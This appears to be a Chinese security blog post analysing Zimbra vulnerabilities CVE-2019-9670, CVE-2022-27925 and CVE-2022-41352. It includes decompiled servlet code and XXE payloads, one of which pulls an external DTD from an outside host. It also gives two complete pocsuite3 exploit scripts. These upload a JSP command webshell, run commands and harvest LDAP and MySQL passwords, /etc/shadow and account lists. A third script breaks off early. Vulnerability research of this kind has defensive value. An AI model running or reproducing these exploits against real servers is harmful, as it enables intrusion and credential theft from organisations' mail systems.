Zimbra Exploit

rainb0w

2023-03-17

security

CVE-2019-9670 zimbra XXE

漏洞原理

网上关于这个漏洞的审计似乎比较少，所以在分析漏洞原理的时候走了一些不必要的弯路。根据漏洞披露出的细节来看，在/Autodiscover中存在CVE-2019-9670，查找zimbra-core中带有Autodicover的类名：

find . -name “*.jar”|awk ‘{print “jar -tvf “$1}’ | sh -x | grep -i Autodiscover

找到如下两个jar包：

可以看出nashorn.jar是jre的中的jar包，应该不是我们的目标，而AutoDiscoverServlet带有Servlet字样，应是对外提供服务的。（这里纠结了很久，其实大致浏览一下代码，就可以确定哪个才是目标）

拿出zimbrastore.jar放入IDEA或者jd-gui进行反编译，其中doPost部分如下：

public void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
    ZimbraLog.clearContext();
    addRemoteIpToLoggingContext(req);
    log.info("Handling autodiscover request...");
    byte[] reqBytes = null;
    byte[] reqBytes = ByteUtil.getContent(req.getInputStream(), req.getContentLength());
    if (reqBytes == null) {
        log.warn("No content found in the request");
        sendError(resp, 600, "No content found in the request");
    } else {
        String content = new String(reqBytes, "UTF-8");
        log.debug("Request before auth: %s", new Object[]{content});
        String responseSchema;
        if (log.isDebugEnabled()) {
            Enumeration<String> enm = req.getHeaderNames();

            while(enm.hasMoreElements()) {
                responseSchema = (String)enm.nextElement();
                log.info("POST header: %s", new Object[]{responseSchema + ":" + req.getHeader(responseSchema)});
            }
        }

        String email = null;
        responseSchema = null;

        DocumentBuilder respDoc;
        try {
            DocumentBuilderFactory docBuilderFactory = DocumentBuilderFactory.newInstance();
            respDoc = docBuilderFactory.newDocumentBuilder();
            Document doc = respDoc.parse(new InputSource(new StringReader(content)));
            NodeList nList = doc.getElementsByTagName("Request");

            for(int i = 0; i < nList.getLength(); ++i) {
                Node node = nList.item(i);
                if (node.getNodeType() == 1) {
                    Element element = (Element)node;
                    email = getTagValue("EMailAddress", element);
                    responseSchema = getTagValue("AcceptableResponseSchema", element);
                    if (email != null) {
                        break;
                    }
                }
            }
        } catch (Exception var17) {
            log.warn("cannot parse body: %s", new Object[]{content});
            sendError(resp, 400, "Body cannot be parsed");
            return;
        }

        if (email != null && email.length() != 0) {
            if (responseSchema != null && responseSchema.length() > 0 && !responseSchema.equals("http://schemas.microsoft.com/exchange/autodiscover/mobilesync/responseschema/2006") && !responseSchema.equals("http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a")) {
                log.warn("Requested response schema not available " + responseSchema);
                sendError(resp, 503, "Requested response schema not available " + responseSchema);
            } else {
                log.debug("Authenticating user");
                Account acct = this.authenticate(req, resp, responseSchema);
                if (acct != null) {
                    log.debug("Authentication finished successfully");
                    log.debug("content length: %d, content type: %s", new Object[]{req.getContentLength(), req.getContentType()});
                    if (req.getContentLength() != 0 && req.getContentType() != null) {
                        try {
                            if (!AccountUtil.addressMatchesAccount(acct, email)) {
                                log.warn(email + " doesn't match account addresses for user " + acct.getName());
                                sendError(resp, 500, email + " doesn't match account addresses");
                                return;
                            }
                        } catch (ServiceException var16) {
                            log.warn("Account access error; user=" + acct.getName(), var16);
                            sendError(resp, 500, "Account access error; user=" + acct.getName());
                            return;
                        }

                        respDoc = null;

                        String respDoc;
                        try {
                            String serviceUrl = getServiceUrl(acct, responseSchema);
                            String displayName = acct.getDisplayName() == null ? email : acct.getDisplayName();
                            if (displayName.contains("@")) {
                                displayName = displayName.substring(0, displayName.indexOf("@"));
                            }

                            log.debug("displayName: %s, email: %s, serviceUrl: %s", new Object[]{displayName, email, serviceUrl});
                            if (isEwsClient(responseSchema)) {
                                respDoc = createResponseDocForEws(displayName, email, serviceUrl, acct);
                            } else {
                                respDoc = createResponseDoc(displayName, email, serviceUrl);
                            }
                        } catch (Exception var15) {
                            log.warn(var15);
                            sendError(resp, 500, var15.getMessage());
                            return;
                        }

                        log.info("Response: %s", new Object[]{respDoc});
                        log.debug("response length: %d", new Object[]{respDoc.length()});

                        try {
                            ByteUtil.copy(new ByteArrayInputStream(respDoc.getBytes("UTF-8")), true, resp.getOutputStream(), false);
                        } catch (IOException var14) {
                            log.error("copy response error", var14);
                            sendError(resp, 500, var14.getMessage());
                            return;
                        }

                        log.debug("setting content type to text/xml");
                        resp.setContentType("text/xml");
                        log.info("sending autodiscover response...");
                    } else {
                        log.warn("No suitable content found in the request");
                        sendError(resp, 600, "No suitable content found in the request");
                    }
                }
            }
        } else {
            log.warn("No Email address is specified in the Request, %s", new Object[]{content});
            sendError(resp, 400, "No Email address is specified in the Request");
        }
    }
}

注意如下部分：

这里获取了我们传入的Request标签中的元素，将EMailAddress标签的值和AcceptableResponseSchema标签的值分别赋值给email和responseSchema，若email为空或responseSchema为空，则直接返回400状态码及Body cannot be parsed。

我们可以传入如下body，查看响应：

此时就可以确认这个类是Autodiscover功能对应类。进入之后的if判断，代码如下：

这里对responseSchema也就是AcceptableResponseSchema标签中的值进行了判断，若不等于http://schemas.microsoft.com/exchange/autodiscover/mobilesync/responseschema/2006或者http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a则返回503以及Requested response schema not available再加上responseSchema的值。因此此处存在回显型xxe。假设传入如下xml：

<!DOCTYPE xxe [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<Request>
    <EMailAddress>aaaaa</EMailAddress>
    <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>

此时email不为空且responseSchema的值为/etc/passwd的内容，攻击者可以成功读取/etc/passwd的值：

可以看到返回的结果正是Requested response schema not available + /etc/passwd，之后的adminToken的获取也正是基于此原理读取/opt/zimbra/conf/localconfig.xml文件获取zimbra_ldap_password。不过因为localconfig.xml文件会在解析器中被解析，无法以文本形式通过XXE漏洞被读出，需要加上<![CDATA[]]>，所以采用外部DTD的方式读取。

Pocsuite-POC

#!/usr/bin/env python
# coding: utf-8

import re
import random
import urllib
import hashlib
import json
import time
import string
import base64
from lxml import etree
import urllib.request
from urllib.parse import urlparse
from pocsuite3.api import (
    minimum_version_required, POCBase, register_poc, requests, logger,
    OptString, OrderedDict,
    random_str, Output,
    get_listener_ip, get_listener_port, REVERSE_PAYLOAD
)


class PoC(POCBase):
    vulID = ''
    name = 'Zimbra 远程代码执行漏洞'
    author = 'rainb0w'
    is0day = False
    type = '远程代码执行'
    # 严重 高危 中危 低危
    level = '严重'
    CVE = 'CVE-2019-9670 CVE-2019-9621'
    CNVD = ''
    CNNVD = ''
    ExploitDB = ''
    Vendor = 'Zimbra'
    appName = 'Zimbra'
    appVersion = ['Zimbra < 8.7.11']
    Tags = []
    search_keyword = 'title="Zimbra 管理"'
    desc = '''
    Zimbra提供一套开源协同办公套件包括WebMail，日历，通信录，Web文档管理和创作。它最大的特色在于其采用Ajax技术模仿CS桌面应用软件的风格开发的客户端兼容Firefox,Safari和IE浏览器。
    '''
    details = '''
    当 Zimbra 存在像任意文件读取、XXE（xml外部实体注入）这种漏洞时，攻击者可以利用此漏洞读取 localconfig.xml配置文件，获取到 zimbra admin ldap password，并通过 7071 admin 端口进行 SOAP AuthRequest 认证，得到 admin authtoken漏洞是利用XXE和ProxyServlet SSRF 漏洞拿到 admin authtoken 后，通过文件上传在服务端执行任意代码，威胁程度极高。当Zimbra服务端打来Memcached缓存服务是，可以利用SSRF攻击进行反序列化执行远程代码。
    '''
    solution = '''
    Zimbra 官方下载最新版本进行修复:https://wiki.zimbra.com/wiki/Zimbra_Releases
    '''
    official_solution = '''
    https://wiki.zimbra.com/wiki/Zimbra_Releases
    '''
    references = []
    samples = []

    def check_Vulnerable(self):
        xml_check = """<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
 <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
      <EMailAddress>aaaaa</EMailAddress>
      <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
    </Request>
  </Autodiscover>"""
        r = requests.post(self.url + '/Autodiscover/Autodiscover.xml', data=xml_check.encode('utf-8'),verify=False, allow_redirects=False)
        if 'Error 503 Requested response' in r.text:
            return True
        else:
            return False

    def get_adminToken(self):
        #https://raw.githubusercontent.com/nth347/Zimbra-RCE-exploit/master/malicious_dtd
        xml1 = """<!DOCTYPE Autodiscover [
        <!ENTITY % dtd SYSTEM "http://192.168.135.1:1234/1.dtd">
        %dtd;
        %all;
        ]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
        <EMailAddress>aaaaa</EMailAddress>
        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
    </Request>
</Autodiscover>"""
        r = requests.post(self.url + '/Autodiscover/Autodiscover.xml', data=xml1.encode('utf-8'),verify=False, allow_redirects=False)
        pattern = re.compile('&lt;/key&gt;\s*&lt;key name="zimbra_ldap_password"&gt;\s*&lt;value&gt;(.*?)&lt;/value&gt;')
        try:
            password = re.findall(pattern, r.text)[0]
            xml2 = """<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
               <soap:Header>
                   <context xmlns="urn:zimbra">
                       <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
                   </context>
               </soap:Header>
               <soap:Body>
                 <AuthRequest xmlns="urn:zimbraAdmin">
                    <account by="adminName">zimbra</account>
                    <password>{}</password>
                 </AuthRequest>
               </soap:Body>
            </soap:Envelope>""".format(password)
            r = requests.post(self.url + '/service/admin/soap', data=xml2.encode('utf-8'), verify=False, allow_redirects=False)
            pattern = re.compile('ZM_ADMIN_AUTH_TOKEN=(.*?);')
            adminToken = re.findall(pattern, r.headers['Set-Cookie'])[0]
            adminToken = "ZM_ADMIN_AUTH_TOKEN=" + adminToken
            return adminToken
        except Exception as e:
            return ''

    def upload_webshell(self):
        self.adminToken = self.get_adminToken()
        fileName = random_str(7)+".jsp"
        file = {
            'filename1': (None, "whocare", None),
            'clientFile': (fileName,
                           r"""<%@ page language="java" pageEncoding="UTF-8" %>
<%
    Runtime rt = Runtime.getRuntime();
    String cmd = request.getParameter("sMuw1P2");
    Process process = rt.exec(cmd);
    java.io.InputStream in = process.getInputStream();
    java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);
    java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);
    String s = null;
    while ((s = stdInput.readLine()) != null) {
        out.println(s);
    }
%>""",
                           "text/plain"),
            'requestId': (None, "12", None),
        }
        headers = {
            "Cookie": self.adminToken,
            "Host": "foo:7071"
        }
        r = requests.post(self.url + "/service/extension/clientUploader/upload", files=file, headers=headers, verify=False, allow_redirects=False)
        self.webshell = (fileName, "sMuw1P2")

    def execute_command(self, command):
        headers = {
            "Cookie": self.adminToken,
            "Host": "foo:7071"
        }
        data = {'sMuw1P2': command}
        r = requests.post(self.url + '/downloads/{}'.format(self.webshell[0]), data=data, headers=headers, verify=False, allow_redirects=False)
        return r.text

    def GetAllAccountsRequest(self):
        xml = """<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context xmlns="urn:zimbra">
<authToken>{}</authToken>
</context></soap:Header><soap:Body>
<GetAllAccountsRequest xmlns="urn:zimbraAdmin">
</GetAllAccountsRequest></soap:Body></soap:Envelope>""".format(self.adminToken.replace('ZM_ADMIN_AUTH_TOKEN=', ''))
        r = requests.post(self.url + '/service/admin/soap', data=xml.encode('utf-8'), verify=False, allow_redirects=False)
        users = []
        pattern = re.compile('<account name="(.*?)" id="(.*?)">[\s\S]*?<a n="cn">(.*?)</a>[\s\S]*?<a n="sn">(.*?)</a>[\s\S]*?</account>')
        result = re.findall(pattern, r.text)
        for i in result:
            userinfo = {'zimbraId': "",
                        "sn": "",
                        "cn": "",
                        "email": ""}
            userinfo['email'] = i[0]
            userinfo['zimbraId'] = i[1]
            userinfo['cn'] = i[2]
            userinfo['sn'] = i[3]
            users.append(userinfo.copy())
        return users

    def get_title(self):
        headers = {
            "Cookie": self.adminToken,
            "Host": "foo:7071"
        }
        r = requests.get(self.url+'/zimbraAdmin', verify=False, headers=headers, allow_redirects=False)
        if r.status_code != 200:
            return ''
        pattern = re.compile('<title>(.+)</title>')
        url_title = re.findall(pattern, r.text)
        try:
            return url_title[0]
        except Exception as e:
            return ''

    def get_ldap_and_mysql_Info(self):
        zmlocalconfig = self.execute_command('/opt/zimbra/bin/zmlocalconfig -s')
        pattern_ldap_Pass = re.compile('zimbra_ldap_password = (.*)')
        pattern_ladp_username = re.compile('zimbra_ldap_user = (.*)')
        pattern_ldap_url = re.compile('ldap_url = (.*)')
        pattern_mysql_address = re.compile('mysql_bind_address = (.*)')
        pattern_mysql_username = re.compile('zimbra_mysql_user = (.*)')
        pattern_mysql_Pass = re.compile('zimbra_mysql_password = (.*)')
        try:
            ldap_Pass = re.findall(pattern_ldap_Pass, zmlocalconfig)[0]
            ldap_user = re.findall(pattern_ladp_username, zmlocalconfig)[0]
            ldap_url = re.findall(pattern_ldap_url, zmlocalconfig)[0]
            mysql_address = re.findall(pattern_mysql_address, zmlocalconfig)[0]
            mysql_username = re.findall(pattern_mysql_username, zmlocalconfig)[0]
            mysql_Pass = re.findall(pattern_mysql_Pass, zmlocalconfig)[0]
            return ldap_url, ldap_user, ldap_Pass, mysql_address, mysql_username, mysql_Pass
        except Exception as e:
            return '', '', '', '', '', ''

    def _verify(self):
        result = {}
        self.raw_url = self.url
        self.host = urlparse(self.url).hostname
        self.port = urlparse(self.url).port
        if self.port is None:
            self.port = 443
        try:
            if self.check_Vulnerable():
                self.upload_webshell()
                result["url"] = self.url+'/zimbraAdmin'
                # Web网站相关信息
                result["web"] = {
                    # 网站默认首页的title信息（可能含有单位或组织信息）
                    "title": self.get_title(),
                    #所有账户信息
                    "users": self.GetAllAccountsRequest()
                }
                # 凭据类信息，针对各类弱口令、默认口令漏洞
                ldap_url, ldap_user, ldap_Pass, mysql_address, mysql_username, mysql_Pass = self.get_ldap_and_mysql_Info()
                result["login_credentials"] = [
                    {"username": ldap_user, "password": ldap_Pass,"ldap_url": ldap_url, "credential_type": "ldap"},
                    {"username": mysql_username, "password": mysql_Pass, "mysql_bind_address": mysql_address, "credential_type": "mysql"}
                ]
                # 获取的文件信息, 针对各类文件读取类漏洞
                result["files"] = [
                    {"name": "passwd", "path": "/etc/passwd", "result": self.execute_command("cat /etc/passwd")},
                    {"name": "hosts", "path": "/etc/hosts", "result": self.execute_command("cat /etc/hosts")},
                    {"name": "shadow", "path": "/etc/shadow", "result": self.execute_command("cat /etc/shadow")},
                    {"name": "resolv,conf", "path": "/etc/resolv.conf", "result": self.execute_command("cat /etc/resolv.conf")},
                    {"name": "localconfig.xml", "path": "/opt/zimbra/conf/localconfig.xml","result": self.execute_command("cat /opt/zimbra/conf/localconfig.xml")},
                ]
                # 命令执行信息, 针对各类命令执行、代码执行漏洞
                result["commands"] = [
                    {"name": "id", "result": self.execute_command("id")},
                    {"name": "whoami", "result": self.execute_command("whoami")},
                    {"name": "arp", "result": self.execute_command("arp -a")},
                    {"name": "ifconfig", "result": self.execute_command("ifconfig")}
                ]
        except Exception as e:
            pass
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if len(result.keys()) != 0:
            json_result = {
                "result": {"json": json.dumps(result)}
            }
            output.success(json_result)
        else:
            output.fail('Internet nothing returned')
        return output


register_poc(PoC)

POC运行结果如下：

CVE-2022-27925 Zimbra路径穿越导致的RCE漏洞

漏洞原理

调试设置

su zimbra
zmcontrol stop
su
cp /opt/zimbra/libexec/zmmailboxdmgr /opt/zimbra/libexec/zmmailboxdmgr.old
cp /opt/zimbra/libexec/zmmailboxdmgr.unrestricted /opt/zimbra/libexec/zmmailboxdmgr
su zimbra
zmlocalconfig -e mailboxd_java_options="`zmlocalconfig -m nokey mailboxd_java_options` -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005"
zmcontrol start

之后在IDEA导入依赖库即可。

漏洞分析

漏洞出现在 mboximport 相关的功能中，全局搜索定位至com.zimbra.cs.service.backup.MailboxImportServlet：

由其命名规则和存在的成员函数来看，MailboxImportServlet应该对应一个HttpServlet对象，但是MailboxImportServlet继承于com.zimbra.cs.extension.ExtensionHttpHandler 而非 HttpServlet，因此需要找到如何通过URL关联到此处。

Zimbra 自定义了 Servlet 对象的基类 ZimbraServlet：

查看ZimbraServlet的子类：

定位至com.zimbra.cs.extension.ExtensionDispatcherServlet：

在webapps\service\WEB-INF\web.xml中可以找到：

因此com.zimbra.cs.extension.ExtensionDispatcherServlet对应的url规则是/service/extension/*，接着在com.zimbra.cs.extension.ExtensionDispatcherServlet#service中：

可以看到handler是一个ExtensionHttpHandler对象，而前面的 MailboxImportServlet 正好继承于 ExtensionHttpHandler。跟进com.zimbra.cs.extension.ExtensionDispatcherServlet#getHandler(javax.servlet.http.HttpServletRequest)：

将url中的/service/extension之后的内容赋值给extPath，若extPath的长度不为0，则执行getHandler(extPath)，并将结果赋值给handler。跟进com.zimbra.cs.extension.ExtensionDispatcherServlet#getHandler(java.lang.String)：

其中sHandlers的定义及赋值如下所示：

sHandlers是一个Map类型的对象，在com.zimbra.cs.extension.ExtensionDispatcherServlet#register中对sHandlers的键值对进行了操作，其中key来自handler.getPath()：

com.zimbra.cs.extension.ExtensionHttpHandler#getPath中存在this.mExtension，可以看到，其在init方法中进行了定义，其中ext是一个ZimbraExtension类型的对象。定位到ZimbraExtension的子类com.zimbra.cs.backup.BackupExtension：

可以看到在此处执行了ExtensionDispatcherServlet的register方法，并且传入的handler正好是一个MailboxImportServlet实例。那么进入register函数，首先执行handler.init(ext);，此时，this.mExtension是一个BackupExtension实例。之后执行String name = handler.getPath();，因为handler是一个MailboxImportServlet实例，MailboxImportServlet的getPath()方法如下所示：

com.zimbra.cs.extension.ExtensionHttpHandler的getPath()方法如下所示：

因为this.mExtension是一个BackupExtension实例，而BackupExtension的getName()方法如下所示：

因此最后name的值为/backup/mboximport，因此sHandlers的一个键值对为：/backup/mboximport => new MailboxImportServlet()。之后经过com.zimbra.cs.extension.ExtensionDispatcherServlet#getHandler(java.lang.String)的执行，就会返回一个MailboxImportServlet实例。接着继续审计com.zimbra.cs.extension.ExtensionDispatcherServlet#service：

根据上面分析，首先得到一个MailboxImportServlet实例handler，之后对请求的方法进行判断，如果是POST方法，则执行该MailboxImportServlet实例的doPost方法。在com.zimbra.cs.service.backup.MailboxImportServlet#doPost中，首先通过 getAuthTokenFromCookie 从 Cookie 中提取 token 认证信息，并检查是否为管理员权限：

若authToken为空或不是管理员，则返回401状态码以及no authtoken cookie，也就是如下情况：

接着代码继续执行：

获取account-name、account-status以及ow参数。接着判断account-name及ow是否为空，若不为空，进入else：

若我们不传入switch-onl、no-switch以及append，那么switchOnly、noSwitch以及append的值为默认值false。之后还获取了account，若为空，则直接返回，程序中断。因此我们传入的account-name必须是一个存在的用户。

接着执行之后的代码，不传入switch-onl参数，此时switchOnly的值为false，进入如下if条件：

在第152行执行了importFrom()方法，其中in为我们POST传入的值。跟进com.zimbra.cs.service.backup.MailboxImportServlet#importFrom：

source是一个ZipBackupTarget实例，构造函数如下：

注意到this.mTempDir = new File(path);，跟进com.zimbra.cs.account.ZAttrServer#getMailboxMoveTempDir：

可以看到path的值默认为/opt/zimbra/backup/tmp/mboxmove。因此mTempDir是一个File实例，代表/opt/zimbra/backup/tmp/mboxmove目录。

之后跟进com.zimbra.cs.backup.ZipBackupTarget#restore方法：

再次跟进com.zimbra.cs.backup.ZipBackupTarget#getAccountSession(java.lang.String)：

返回一个RestoreAcctSession实例，构造方法如下所示：

执行了this.mTempDir = new File(ZipBackupTarget.this.getTempRoot(), accountId);，跟进com.zimbra.cs.backup.ZipBackupTarget#getTempRoot：

返回的是this.mTempDir，因此此时的this.mTempDir代表的是/opt/zimbra/backup/tmp/mboxmove/xxxxxxxxx目录，其中xxxxxxxxx为accountId。之后跟进com.zimbra.cs.backup.ZipBackupTarget.RestoreAcctSession#unzipToTempFiles：

可以看到此处存在路径穿越漏洞。假设我们将压缩包中文件的名字设为../1.txt，那么file对象指代带的就是/opt/zimbra/backup/tmp/mboxmove/xxxxxxxxx/../1.txt，也就是/opt/zimbra/backup/tmp/mboxmove/1.txt。之后跟进com.zimbra.common.util.FileUtil#copy(java.io.InputStream, boolean, java.io.File)：

可以看到这里将文件内容写入到对应的文件中。因此利用思路已经很明了了。

我们需要以POST方法在/service/extension/backup/mboximport?account-name=admin&account-status=1&ow=xxx中传入一个压缩包，其中压缩包中有一个文件名为../../../../mailboxd/webapps/zimbraAdmin/1.jsp的文件，内容为普通的webshell payload即可，这样的话上面提到的file对象指代带的就是/opt/zimbra/mailboxd/webapps/zimbraAdmin/1.jsp，程序会将webshell payload写入到/opt/zimbra/mailboxd/webapps/zimbraAdmin/1.jsp中。

Pocsuite-POC

poc可以获取到管理员邮箱、ldap用户密码、mysql地址账号密码以及zimbra敏感配置文件localconfig.xml等敏感信息。

#!/usr/bin/env python
# coding: utf-8

import re
import random
import urllib
import hashlib
import json
import zipfile
import io
import time
import string
import base64
from lxml import etree
import urllib.request
from urllib.parse import urlparse
from pocsuite3.api import (
    minimum_version_required, POCBase, register_poc, requests, logger,
    OptString, OrderedDict,
    random_str, Output,
    get_listener_ip, get_listener_port, REVERSE_PAYLOAD
)


class PoC(POCBase):
    vulID = ''
    name = 'Zimbra路径穿越导致的RCE漏洞'
    author = 'rainb0w'
    is0day = False
    type = '目录穿越'
    # 严重 高危 中危 低危
    level = '严重'
    CVE = 'CVE-2022-27925'
    CNVD = ''
    CNNVD = ''
    ExploitDB = ''
    Vendor = 'Zimbra'
    appName = ''
    appVersion = ['v8.8.15 P30-v9.0.0 P23']
    Tags = []
    search_keyword = 'title:"Zimbra 管理"'
    desc = '''
    Zimbra 是一家提供专业的电子邮件软件开发供应商，主要提供ZimbraDesktop邮件管理软件。另外提供一套开源协同办公套件包括WebMail，日历，通信录，Web文档管理和创作。
    Zimbra的最大特色在于其采用Ajax技术模仿CS桌面应用软件的风格开发的客户端兼容Firefox，Safari和IE浏览器。
    '''
    details = '''
    最初，Zimbra将CVE-2022-27925称为经过身份验证的路径遍历攻击，其中管理用户可以将文件写入文件系统上的任何目录。因为它最初被认为是仅限管理员的攻击，NVD给它的CVSS基本评分为7.8。
    后来，Volexity注意到利用此漏洞的攻击者找到了绕过管理要求的方法，并于2022年8月10日对此进行了报道。这个新的身份验证旁路获得了一个新的标识符- CVE-2022-37042。
    通过结合原始路径遍历漏洞和新的身份验证绕过，攻击者可以通过管理员端口（默认为7071）匿名远程危害Zimbra Collaboration Suite系统。
    '''
    solution = '''
    Zimbra 官方下载最新版本进行修复:https://wiki.zimbra.com/wiki/Zimbra_Releases
    '''
    official_solution = '''
    https://wiki.zimbra.com/wiki/Zimbra_Releases
    '''
    references = []
    samples = []


    def build_zip(self, jsp, path):
        zip_buffer = io.BytesIO()
        zf = zipfile.ZipFile(zip_buffer, 'w')
        zf.writestr(path, jsp)
        zf.close()
        return zip_buffer.getvalue()

    def upload_webshell(self):
        paths = ['../../../../mailboxd/webapps/zimbraAdmin/', '../../../../jetty_base/webapps/zimbraAdmin/', '../../../../jetty/webapps/zimbraAdmin/']
        self.webshellName = random_str(10) + '.jsp'
        self.webshellPass = "sMuw1P2"
        webshell_payload = r"""<%@ page language="java" pageEncoding="UTF-8" %>
<%
    Runtime rt = Runtime.getRuntime();
    String cmd = request.getParameter("sMuw1P2");
    Process process = rt.exec(cmd);
    java.io.InputStream in = process.getInputStream();
    java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);
    java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);
    String s = null;
    while ((s = stdInput.readLine()) != null) {
        out.println(s);
    }
%>"""
        try:
            flag = False
            for i in paths:
                endpoints = ["/service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd",
                             "/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1"]
                zippedfile = self.build_zip(webshell_payload, i + self.webshellName)
                headers = {'content-Type': 'application/x-www-form-urlencoded'}
                for endpoint in endpoints:
                    requests.post(self.url + endpoint, data=zippedfile, verify=False, headers=headers, allow_redirects=False)
                    ranStr2echo = random_str(10)
                    if ranStr2echo in self.execute_command('echo {}'.format(ranStr2echo)):
                        flag = True
                        break
                if flag:
                    return True
            return False
        except Exception as e:
            return False

    def execute_command(self, command):
        data = {self.webshellPass: command}
        req = requests.post(self.url + '/zimbraAdmin/{}'.format(self.webshellName), data=data, verify=False, allow_redirects=False)
        return req.text

    def get_title(self):
        r = requests.get(self.url, verify=False)
        if r.status_code != 200:
            return ''
        pattern = re.compile('<title>(.+)</title>')
        url_title = re.findall(pattern, r.text)
        try:
            return url_title[0]
        except Exception as e:
            return ''

    def get_ldap_and_mysql_Info(self):
        zmlocalconfig = self.execute_command('/opt/zimbra/bin/zmlocalconfig -s')
        pattern_email = re.compile('av_notify_user = (.*)')
        pattern_ldap_Pass = re.compile('zimbra_ldap_password = (.*)')
        pattern_ladp_username = re.compile('zimbra_ldap_user = (.*)')
        pattern_ldap_url = re.compile('ldap_url = (.*)')
        pattern_mysql_address = re.compile('mysql_bind_address = (.*)')
        pattern_mysql_username = re.compile('zimbra_mysql_user = (.*)')
        pattern_mysql_Pass = re.compile('zimbra_mysql_password = (.*)')
        try:
            ldap_Pass = re.findall(pattern_ldap_Pass, zmlocalconfig)[0]
            ldap_user = re.findall(pattern_ladp_username, zmlocalconfig)[0]
            ldap_url = re.findall(pattern_ldap_url, zmlocalconfig)[0]
            mysql_address = re.findall(pattern_mysql_address, zmlocalconfig)[0]
            mysql_username = re.findall(pattern_mysql_username, zmlocalconfig)[0]
            mysql_Pass = re.findall(pattern_mysql_Pass, zmlocalconfig)[0]
            av_notify_user = re.findall(pattern_email, zmlocalconfig)[0]
            return ldap_url, ldap_user, ldap_Pass, mysql_address, mysql_username, mysql_Pass, av_notify_user
        except Exception as e:
            return '', '', '', '', '', ''

    def _verify(self):
        result = {}
        self.raw_url = self.url
        self.host = urlparse(self.url).hostname
        self.port = urlparse(self.url).port
        if self.port is None:
            self.port = 443
        try:
            if self.upload_webshell():
                result["url"] = self.url

                ldap_url, ldap_user, ldap_Pass, mysql_address, mysql_username, mysql_Pass, av_notify_user = self.get_ldap_and_mysql_Info()
                # Web网站相关信息
                result["web"] = {
                    # 网站默认首页的title信息（可能含有单位或组织信息）
                    "title": self.get_title(),
                    #webshell路径及参数名
                    "webshell": {'path': '/zimbraAdmin/{}'.format(self.webshellName),
                                 "password": self.webshellPass},
                    "admin notification emails": av_notify_user
                }
                # 凭据类信息，针对各类弱口令、默认口令漏洞
                result["login_credentials"] = [
                    {"username": ldap_user, "password": ldap_Pass, "ldap_url": ldap_url, "credential_type": "ldap"},
                    {"username": mysql_username, "password": mysql_Pass, "mysql_bind_address": mysql_address, "credential_type": "mysql"}
                ]
                # 获取的文件信息, 针对各类文件读取类漏洞
                result["files"] = [
                    {"name": "passwd", "path": "/etc/passwd", "result": self.execute_command("cat /etc/passwd")},
                    {"name": "hosts", "path": "/etc/hosts", "result": self.execute_command("cat /etc/hosts")},
                    {"name": "shadow", "path": "/etc/shadow", "result": self.execute_command("cat /etc/shadow")},
                    {"name": "resolv,conf", "path": "/etc/resolv.conf", "result": self.execute_command("cat /etc/resolv.conf")},
                    {"name": "localconfig.xml", "path": "/opt/zimbra/conf/localconfig.xml", "result": self.execute_command("cat /opt/zimbra/conf/localconfig.xml")},
                ]
                # 命令执行信息, 针对各类命令执行、代码执行漏洞
                result["commands"] = [
                    {"name": "id", "result": self.execute_command("id")},
                    {"name": "whoami", "result": self.execute_command("whoami")},
                    {"name": "arp", "result": self.execute_command("arp -a")},
                    {"name": "ifconfig", "result": self.execute_command("ifconfig")}
                ]

        except Exception as e:
            pass
        return self.parse_output(result)

    def _attack(self):
        return self._verify()


    def parse_output(self, result):
        output = Output(self)
        if len(result.keys()) != 0:
            json_result = {
                "result": {"json": json.dumps(result)}
            }
            output.success(json_result)
        else:
            output.fail('Internet nothing returned')
        return output


register_poc(PoC)

POC运行结果如下：

CVE-2022-41352 Zimbra Unauthenticated RCE

漏洞原理

在Zimbra Collaboration（ZCS）8.8.15 和 9.0中，攻击者可以利用cpio漏洞通过amavisd上传任意文件到web目录/opt/zimbra/jetty/webapps/zimbra/public，从而导致未授权远程代码执行。 Zimbra建议用户使用pax代替cpio，虽然安装pax是Ubuntu上安装Zimbra的前提条件，但是在RHEL 6（或CentOS 6）之后，Red Hat发行版不再默认安装pax。

Pocsuite-POC

#!/usr/bin/env python
# coding: utf-8

import re
import random
import urllib
import hashlib
import json
import zipfile
import io
import time
import string
import base64
from lxml import etree
import smtplib
import urllib.request
from urllib.parse import urlparse
from pocsuite3.api import (
    minimum_version_required, POCBase, register_poc, requests, logger,
    OptString, OrderedDict,
    random_str, Output,
    get_listener_ip, get_listener_port, REVERSE_PAYLOAD
)
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
from email.mime.text import MIMEText


class PoC(POCBase):
    vulID = ''
    name = 'Zimbra Unauthenticated RCE'
    author = 'rainb0w'
    is0day = False
    type = '远程代码执行'
    # 严重 高危 中危 低危
    level = '验证'
    CVE = 'CVE-2022-41352'
    CNVD = ''
    CNNVD = ''
    ExploitDB = ''
    Vendor = 'Zimbra'
    appName = 'Zimbra'
    appVersion = ['Zimbra <9.0.0.p27', 'Zimbra <8.8.15.p34']
    Tags = []
    search_keyword = 'title:"Zimbra 网络客户端登录"'
    desc = '''
    Zimbra是著名的开源系统，提供了一套开源协同办公套件包括WebMail，日历，通信录，Web文档管理和创作。一体化地提供了邮件收发、文件共享、协同办公、即时聊天等一系列解决方案，是开源软件中的精品。
